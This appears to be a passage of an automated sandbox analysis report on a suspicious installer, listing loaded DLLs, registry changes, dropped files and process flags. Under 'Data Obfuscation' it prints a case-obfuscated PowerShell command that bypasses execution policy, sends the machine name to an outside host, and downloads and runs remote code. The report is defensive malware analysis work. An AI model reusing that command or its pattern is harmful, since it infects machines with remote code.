Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: installer_1.05_36.5.exe

Static file information: File size 1080005 > 1048576

Source: installer_1.05_36.5.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbQ@ source: powershell.exe, 00000011.00000002.2315065218.0000000003421000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbd source: powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2322404249.0000000007704000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;			Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: installer_1.05_36.5.exe	Static PE information: real checksum: 0x105d4f should be: 0x1121c8
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe.12.dr	Static PE information: real checksum: 0x9307ce should be: 0x8615ed

Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe.12.dr	Static PE information: section name: .didata
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	Static PE information: section name: .didata
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr	Static PE information: section name: .didata

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File created: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	File created: C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	File created: C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	File created: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	File created: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-N6HUM.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	File created: C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	File created: C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
